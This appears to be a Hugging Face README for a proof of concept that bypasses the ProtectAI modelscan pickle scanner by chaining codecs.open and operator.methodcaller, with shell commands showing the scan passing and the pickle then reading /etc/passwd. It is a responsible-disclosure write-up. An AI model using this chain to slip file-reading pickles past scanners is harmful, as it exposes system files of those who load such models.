manja316's picture
Add README
60244fd verified
|
Raw
History Blame Contribute Delete
774 Bytes
---
tags:
- security-research
- proof-of-concept
license: mit
---
# Modelscan Bypass PoC: codecs.open + operator.methodcaller
**Purpose:** Security research demonstrating a scanner bypass in ProtectAI modelscan.
## Technique
- `codecs.open` is not in modelscan's unsafe_globals blocklist (only `builtins.open` is blocked)
- `operator.methodcaller` is not blocked (only `operator.attrgetter` is)
- Chain: `methodcaller('read')(codecs.open('/etc/passwd'))` → reads any file
## Verification
```bash
pip install modelscan
modelscan scan -p model.pkl
# Output: "No issues found!"
python3 -c "import pickle; print(pickle.load(open('model.pkl','rb'))[:100])"
# Output: contents of /etc/passwd
```
## Responsible Disclosure
Submitted to ProtectAI via Huntr MFV program.